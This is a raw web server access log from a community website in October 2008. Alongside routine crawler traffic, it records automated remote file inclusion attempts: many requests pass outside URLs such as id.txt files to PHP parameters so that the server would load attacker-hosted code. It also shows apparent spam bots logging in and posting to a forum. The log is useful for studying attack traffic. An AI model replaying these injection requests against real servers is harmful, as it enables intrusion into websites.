208.115.111.242 - - [30/Oct/2008:06:12:30 -0700] "GET /forum2/index.php?s=3507a257e6f76a1b18a184f00088ab7f&act=Post&CODE=02&f=9&t=147&qpid=1085 HTTP/1.1" 200 7727 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
203.146.15.54 - - [30/Oct/2008:06:12:41 -0700] "GET /logs/access_081015.log//skin/zero_vote/error.php?dir=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 784 "-" "libwww-perl/5.805" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:06:12:41 -0700] "GET /forum2/index.php?s=3507a257e6f76a1b18a184f00088ab7f&act=Post&CODE=02&f=9&t=147&qpid=832 HTTP/1.1" 200 7727 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
154.5.252.194 - - [30/Oct/2008:06:13:10 -0700] "GET /logs/access_081016.log/phphtml.php?htmlclass_path=http://610times.com/bbs/info/id.txt?? HTTP/1.1" 404 770 "-" "libwww-perl/5.79" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:13:14 -0700] "GET /listings/listing/results.php?category_id=752 HTTP/1.1" 200 28664 "http://www.sancarloscity.org/listings/listing/results.php?letter=e&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:06:13:20 -0700] "GET /forum2/index.php?showtopic=106&pid=1591&mode=threaded&start= HTTP/1.1" 200 7410 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:06:13:23 -0700] "GET /forum2/index.php?showtopic=114&pid=534&mode=threaded&show=&st=0 HTTP/1.1" 200 7409 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:06:13:26 -0700] "GET /forum2/index.php?showtopic=7&pid=8&mode=threaded&show=&st=0 HTTP/1.1" 200 7407 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:13:30 -0700] "GET /listings/listing/results.php?category_id=757 HTTP/1.1" 200 24157 "http://www.sancarloscity.org/listings/listing/results.php?letter=e&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
208.83.106.201 - - [30/Oct/2008:06:13:47 -0700] "GET /appserv/main.php?appserv_root=http://www.mahbaran.com/load/test.txt?? HTTP/1.1" 404 752 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.sancarloscity.org"
208.83.106.201 - - [30/Oct/2008:06:13:48 -0700] "GET /logs/appserv/main.php?appserv_root=http://www.mahbaran.com/load/test.txt?? HTTP/1.1" 404 757 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:13:49 -0700] "GET /listings/listing/results.php?category_id=746 HTTP/1.1" 200 24376 "http://www.sancarloscity.org/listings/listing/results.php?letter=e&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
72.29.83.65 - - [30/Oct/2008:06:13:51 -0700] "GET /logs/access_081015.log/?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 759 "-" "libwww-perl/5.810" "www.sancarloscity.org"
72.29.83.65 - - [30/Oct/2008:06:13:51 -0700] "GET /?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.helpvenice.com/id.txt??? HTTP/1.1" 200 44270 "-" "libwww-perl/5.810" "www.sancarloscity.org"
72.29.83.65 - - [30/Oct/2008:06:13:51 -0700] "GET /logs/?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.helpvenice.com/id.txt??? HTTP/1.1" 200 71305 "-" "libwww-perl/5.810" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:13:58 -0700] "GET /listings/listing/results.php?category_id=732 HTTP/1.1" 200 31141 "http://www.sancarloscity.org/listings/listing/results.php?letter=i&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
74.6.8.93 - - [30/Oct/2008:06:14:00 -0700] "GET /picgallery/index.php HTTP/1.0" 200 61344 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:14:01 -0700] "GET / HTTP/1.1" 200 44270 "http://www.sancarloscity.org/listings/listing/results.php?letter=i&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:14:05 -0700] "GET /listings/listing/results.php?category_id=714 HTTP/1.1" 200 24415 "http://www.sancarloscity.org/listings/listing/results.php?letter=i&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:14:08 -0700] "GET /listings/listing/results.php?category_id=691 HTTP/1.1" 200 53084 "http://www.sancarloscity.org/listings/listing/results.php?letter=i&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:14:09 -0700] "GET /listings/listing/results.php?category_id=705 HTTP/1.1" 200 24477 "http://www.sancarloscity.org/listings/listing/results.php?letter=i&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:14:18 -0700] "GET /listings/listing/results.php?category_id=736 HTTP/1.1" 200 24382 "http://www.sancarloscity.org/listings/listing/results.php?letter=i&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
72.30.79.49 - - [30/Oct/2008:06:14:19 -0700] "GET /lolanitangs/ HTTP/1.0" 200 9688 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:14:22 -0700] "GET /listings/listing/results.php?category_id=708 HTTP/1.1" 200 24431 "http://www.sancarloscity.org/listings/listing/results.php?letter=i&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:14:26 -0700] "GET /listings/listing/results.php?category_id=699 HTTP/1.1" 200 31242 "http://www.sancarloscity.org/listings/listing/results.php?letter=i&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
89.149.196.210 - - [30/Oct/2008:06:14:28 -0700] "GET /jodera2/posting.php?mode=reply&t=24084 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24084" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; es) AppleWebKit/85 (KHTML, like Gecko) Safari/85" "www.sancarloscity.org"
89.149.196.210 - - [30/Oct/2008:06:14:29 -0700] "GET /jodera2/login.php?redirect=posting.php&mode=reply&t=24084&sid=8f55465072ab1be9442c06903862ea92 HTTP/1.0" 200 12363 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=24084&sid=8f55465072ab1be9442c06903862ea92" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; es) AppleWebKit/85 (KHTML, like Gecko) Safari/85" "www.sancarloscity.org"
89.149.196.210 - - [30/Oct/2008:06:14:31 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=24084&sid=8f55465072ab1be9442c06903862ea92" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; es) AppleWebKit/85 (KHTML, like Gecko) Safari/85" "www.sancarloscity.org"
89.149.196.210 - - [30/Oct/2008:06:14:32 -0700] "GET /jodera2/posting.php?mode=reply&t=24084&sid=8f55465072ab1be9442c06903862ea92 HTTP/1.0" 200 50670 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24084&sid=8f55465072ab1be9442c06903862ea92" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; es) AppleWebKit/85 (KHTML, like Gecko) Safari/85" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:14:46 -0700] "GET /listings/listing/results.php?category_id=737 HTTP/1.1" 200 28719 "http://www.sancarloscity.org/listings/listing/results.php?letter=i&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
89.149.196.210 - - [30/Oct/2008:06:14:49 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11444 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24084&sid=8f55465072ab1be9442c06903862ea92" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; es) AppleWebKit/85 (KHTML, like Gecko) Safari/85" "www.sancarloscity.org"
89.218.85.18 - - [30/Oct/2008:06:14:49 -0700] "GET /logs/access_081015.log//skin/zero_vote/error.php?dir=http://www.manifestotrl.org/v6.txt?? HTTP/1.0" 404 768 "-" "libwww-perl/5.805" "www.sancarloscity.org"
89.149.196.210 - - [30/Oct/2008:06:14:50 -0700] "GET /jodera2/viewtopic.php?p=29917#29917 HTTP/1.0" 200 82457 "http://www.sancarloscity.org/viewtopic.php?p=29917#29917" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; es) AppleWebKit/85 (KHTML, like Gecko) Safari/85" "www.sancarloscity.org"
64.113.39.18 - - [30/Oct/2008:06:15:21 -0700] "GET /logs/access_081006.log/phphtml.php?htmlclass_path=http://chat.laosmile.com/temp/templates/info/id.txt?? HTTP/1.1" 404 770 "-" "libwww-perl/5.819" "www.sancarloscity.org"
64.113.39.18 - - [30/Oct/2008:06:15:21 -0700] "GET /logs/access_081006.log/phphtml.php?htmlclass_path=http://chat.laosmile.com/temp/templates/info/id.txt?? HTTP/1.1" 404 770 "-" "libwww-perl/5.819" "www.sancarloscity.org"
64.113.39.18 - - [30/Oct/2008:06:15:26 -0700] "GET /phphtml.php?htmlclass_path=http://chat.laosmile.com/temp/templates/info/id.txt?? HTTP/1.1" 404 760 "-" "libwww-perl/5.819" "www.sancarloscity.org"
64.113.39.18 - - [30/Oct/2008:06:15:26 -0700] "GET /phphtml.php?htmlclass_path=http://chat.laosmile.com/temp/templates/info/id.txt?? HTTP/1.1" 404 760 "-" "libwww-perl/5.819" "www.sancarloscity.org"
64.113.39.18 - - [30/Oct/2008:06:15:31 -0700] "GET /logs/phphtml.php?htmlclass_path=http://chat.laosmile.com/temp/templates/info/id.txt?? HTTP/1.1" 404 765 "-" "libwww-perl/5.819" "www.sancarloscity.org"
64.113.39.18 - - [30/Oct/2008:06:15:31 -0700] "GET /logs/phphtml.php?htmlclass_path=http://chat.laosmile.com/temp/templates/info/id.txt?? HTTP/1.1" 404 765 "-" "libwww-perl/5.819" "www.sancarloscity.org"
221.194.142.30 - - [30/Oct/2008:06:15:48 -0700] "GET / HTTP/1.1" 200 44270 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; CollapsarWEB qihoobot@qihoo.net)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:06:15:56 -0700] "GET /forum2/index.php?s=3507a257e6f76a1b18a184f00088ab7f&act=Post&CODE=02&f=9&t=147&qpid=872 HTTP/1.1" 200 7727 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:06:16:00 -0700] "GET /forum2/index.php?s=3507a257e6f76a1b18a184f00088ab7f&act=Print&client=choose&f=9&t=147 HTTP/1.1" 200 7727 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:06:16:04 -0700] "GET /forum2/index.php?s=3507a257e6f76a1b18a184f00088ab7f&act=Print&client=printer&f=9&t=147 HTTP/1.1" 200 7727 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:06:16:09 -0700] "GET /forum2/index.php?s=3507a257e6f76a1b18a184f00088ab7f&act=Reg&CODE=00 HTTP/1.1" 200 9222 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:06:16:14 -0700] "GET /forum2/index.php?s=3507a257e6f76a1b18a184f00088ab7f&act=Search HTTP/1.1" 200 7722 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:06:16:19 -0700] "GET /forum2/index.php?s=3507a257e6f76a1b18a184f00088ab7f&act=Search&CODE=getalluser&mid=13 HTTP/1.1" 200 7722 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:06:16:22 -0700] "GET /forum2/index.php?showtopic=112&pid=468&mode=threaded&show=&st=0 HTTP/1.1" 200 7411 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:06:16:23 -0700] "GET /forum2/index.php?s=3507a257e6f76a1b18a184f00088ab7f&act=Search&CODE=getalluser&mid=14 HTTP/1.1" 200 7722 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:06:16:27 -0700] "GET /forum2/index.php?s=3507a257e6f76a1b18a184f00088ab7f&act=Search&CODE=getalluser&mid=155 HTTP/1.1" 200 7722 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:06:16:32 -0700] "GET /forum2/index.php?s=3507a257e6f76a1b18a184f00088ab7f&act=Search&f=9 HTTP/1.1" 200 7724 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:06:16:38 -0700] "GET /forum2/index.php?s=3507a257e6f76a1b18a184f00088ab7f&act=calendar HTTP/1.1" 200 7722 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
64.1.215.166 - - [30/Oct/2008:06:16:46 -0700] "GET /classifieds/index.php?method=showdetails&list=advertisement&rollid=173&fromlist=advertisement&frommethod=showdetails&fromid=250&fromfromlist=advertisement_active&fromfrommethod=showhtmllist HTTP/1.0" 200 94 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.sancarloscity.org"
74.6.8.93 - - [30/Oct/2008:06:16:46 -0700] "GET /listings/listing/results.php?letter=c&category_id=741 HTTP/1.0" 200 25069 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
209.160.65.55 - - [30/Oct/2008:06:17:20 -0700] "GET /logs/access_080929.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt???? HTTP/1.1" 404 831 "-" "libwww-perl/5.810" "www.sancarloscity.org"
72.29.83.65 - - [30/Oct/2008:06:17:21 -0700] "GET /?dir=http://www.helpvenice.com/id.txt??? HTTP/1.1" 200 44270 "-" "libwww-perl/5.810" "www.sancarloscity.org"
72.29.83.65 - - [30/Oct/2008:06:17:21 -0700] "GET /logs/?dir=http://www.helpvenice.com/id.txt??? HTTP/1.1" 200 71305 "-" "libwww-perl/5.810" "www.sancarloscity.org"
81.19.66.38 - - [30/Oct/2008:06:17:23 -0700] "GET /jodera2/viewtopic.php?p=27760&sid=ac659fb9cef1849b6510015054c53fa0 HTTP/1.1" 200 76405 "-" "StackRambler/2.0 (MSIE incompatible)" "www.sancarloscity.org"
72.29.83.65 - - [30/Oct/2008:06:17:25 -0700] "GET /logs/access_081015.log/?dir=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 759 "-" "libwww-perl/5.810" "www.sancarloscity.org"
81.19.66.38 - - [30/Oct/2008:06:17:26 -0700] "GET /jodera2/viewtopic.php?p=27795&sid=ab103a053cd9eb0a0f6c07c5a8bb02a9 HTTP/1.1" 200 76719 "-" "StackRambler/2.0 (MSIE incompatible)" "www.sancarloscity.org"
81.19.66.38 - - [30/Oct/2008:06:17:28 -0700] "GET /jodera2/viewtopic.php?p=27789&sid=1f9addfbf892fba5f0b33db4fb19b8b2 HTTP/1.1" 200 76172 "-" "StackRambler/2.0 (MSIE incompatible)" "www.sancarloscity.org"
81.19.66.38 - - [30/Oct/2008:06:17:30 -0700] "GET /jodera2/viewtopic.php?p=27832&sid=2f7ea38f1fd01c011ae720ae571da917 HTTP/1.1" 200 76176 "-" "StackRambler/2.0 (MSIE incompatible)" "www.sancarloscity.org"
81.19.66.38 - - [30/Oct/2008:06:17:32 -0700] "GET /jodera2/viewtopic.php?p=27198&sid=298ca83ce74d13c21504f5eb62c17def HTTP/1.1" 200 69276 "-" "StackRambler/2.0 (MSIE incompatible)" "www.sancarloscity.org"
82.99.30.7 - - [30/Oct/2008:06:17:37 -0700] "GET /jodera2/viewtopic.php?p=27918 HTTP/1.0" 200 33072 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
121.124.127.40 - - [30/Oct/2008:06:17:40 -0700] "GET /logs/access_081013.log/errors.php?error=http://reynoldsdnaproject.com///photos/id.txt? HTTP/1.1" 404 769 "-" "libwww-perl/5.79" "www.sancarloscity.org"
208.111.154.16 - - [30/Oct/2008:06:17:47 -0700] "GET /picgallery/displayimage.php?album=6&pos=2 HTTP/1.1" 200 10131 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:17:57 -0700] "GET /listings/listing/results.php?category_id=705 HTTP/1.1" 200 24477 "http://www.sancarloscity.org/listings/listing/results.php?letter=z&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:18:01 -0700] "GET /listings/listing/results.php?category_id=708 HTTP/1.1" 200 24431 "http://www.sancarloscity.org/listings/listing/results.php?letter=z&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:18:08 -0700] "GET /listings/listing/results.php?category_id=696 HTTP/1.1" 200 28997 "http://www.sancarloscity.org/listings/listing/results.php?letter=z&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
89.149.241.165 - - [30/Oct/2008:06:18:08 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.sancarloscity.org"
89.149.241.165 - - [30/Oct/2008:06:18:09 -0700] "GET /jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=b313f510a89816d39acf24f2fc02e00b HTTP/1.0" 200 12362 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=b313f510a89816d39acf24f2fc02e00b" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.sancarloscity.org"
89.149.241.165 - - [30/Oct/2008:06:18:10 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=b313f510a89816d39acf24f2fc02e00b" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.sancarloscity.org"
74.6.8.93 - - [30/Oct/2008:06:18:10 -0700] "GET /listings/claim.php?claimlistingid=14884 HTTP/1.0" 200 12768 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
89.149.241.165 - - [30/Oct/2008:06:18:11 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1&sid=b313f510a89816d39acf24f2fc02e00b HTTP/1.0" 200 40970 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1&sid=b313f510a89816d39acf24f2fc02e00b" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:18:11 -0700] "GET /listings/listing/results.php?category_id=744 HTTP/1.1" 200 28921 "http://www.sancarloscity.org/listings/listing/results.php?letter=z&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:18:14 -0700] "GET / HTTP/1.1" 200 44270 "http://www.sancarloscity.org/listings/listing/results.php?letter=z&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
89.149.196.212 - - [30/Oct/2008:06:18:17 -0700] "GET /jodera2/posting.php?mode=reply&t=24088 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24088" "Mozilla/5.0 (OS/2; U; Warp 4.5; en-US; rv:1.7.12) Gecko/20050922 Firefox/1.0.7" "www.sancarloscity.org"
89.149.196.212 - - [30/Oct/2008:06:18:17 -0700] "GET /jodera2/login.php?redirect=posting.php&mode=reply&t=24088&sid=9d73c0ede38e0991cfa231620b692570 HTTP/1.0" 200 12363 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=24088&sid=9d73c0ede38e0991cfa231620b692570" "Mozilla/5.0 (OS/2; U; Warp 4.5; en-US; rv:1.7.12) Gecko/20050922 Firefox/1.0.7" "www.sancarloscity.org"
89.149.196.212 - - [30/Oct/2008:06:18:19 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=24088&sid=9d73c0ede38e0991cfa231620b692570" "Mozilla/5.0 (OS/2; U; Warp 4.5; en-US; rv:1.7.12) Gecko/20050922 Firefox/1.0.7" "www.sancarloscity.org"
89.149.196.212 - - [30/Oct/2008:06:18:19 -0700] "GET /jodera2/posting.php?mode=reply&t=24088&sid=9d73c0ede38e0991cfa231620b692570 HTTP/1.0" 200 50494 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24088&sid=9d73c0ede38e0991cfa231620b692570" "Mozilla/5.0 (OS/2; U; Warp 4.5; en-US; rv:1.7.12) Gecko/20050922 Firefox/1.0.7" "www.sancarloscity.org"
89.149.241.165 - - [30/Oct/2008:06:18:19 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11444 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1&sid=b313f510a89816d39acf24f2fc02e00b" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.sancarloscity.org"
89.149.241.165 - - [30/Oct/2008:06:18:20 -0700] "GET /jodera2/viewtopic.php?p=29918 HTTP/1.0" 200 31382 "http://www.sancarloscity.org/viewtopic.php?p=29918#29918" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:18:21 -0700] "GET /listings/listing/results.php?category_id=732 HTTP/1.1" 200 31141 "http://www.sancarloscity.org/listings/listing/results.php?letter=z&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
89.149.196.212 - - [30/Oct/2008:06:18:31 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11256 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24088&sid=9d73c0ede38e0991cfa231620b692570" "Mozilla/5.0 (OS/2; U; Warp 4.5; en-US; rv:1.7.12) Gecko/20050922 Firefox/1.0.7" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:18:31 -0700] "GET /listings/listing/results.php?category_id=716 HTTP/1.1" 200 24409 "http://www.sancarloscity.org/listings/listing/results.php?letter=z&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
65.254.55.178 - - [30/Oct/2008:06:18:52 -0700] "GET /errors.php?error=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 759 "-" "libwww-perl/5.812" "www.sancarloscity.org"
65.254.55.178 - - [30/Oct/2008:06:18:52 -0700] "GET /logs/errors.php?error=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 764 "-" "libwww-perl/5.812" "www.sancarloscity.org"
65.254.55.178 - - [30/Oct/2008:06:18:52 -0700] "GET /logs/access_081007.log/errors.php?error=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 769 "-" "libwww-perl/5.812" "www.sancarloscity.org"
65.254.55.178 - - [30/Oct/2008:06:18:53 -0700] "GET /logs/access_080907.log/errors.php?error=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 769 "-" "libwww-perl/5.812" "www.sancarloscity.org"
200.63.42.95 - - [30/Oct/2008:06:19:25 -0700] "GET /jodera2/index.php HTTP/1.0" 200 61702 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "www.sancarloscity.org"
222.236.44.26 - - [30/Oct/2008:06:19:28 -0700] "GET /logs/access_080308.log/?mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 759 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.sancarloscity.org"
222.236.44.26 - - [30/Oct/2008:06:19:28 -0700] "GET /?mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 200 44270 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.sancarloscity.org"
222.236.44.26 - - [30/Oct/2008:06:19:28 -0700] "GET /logs/?mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 200 71305 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.sancarloscity.org"
200.63.42.95 - - [30/Oct/2008:06:19:34 -0700] "GET /jodera2/viewforum.php?f=1&sid=858e7b3528ebaaf8b102cce9be236784 HTTP/1.0" 200 84775 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:06:19:39 -0700] "GET /forum2/index.php?s=3507a257e6f76a1b18a184f00088ab7f&act=home HTTP/1.1" 200 7722 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
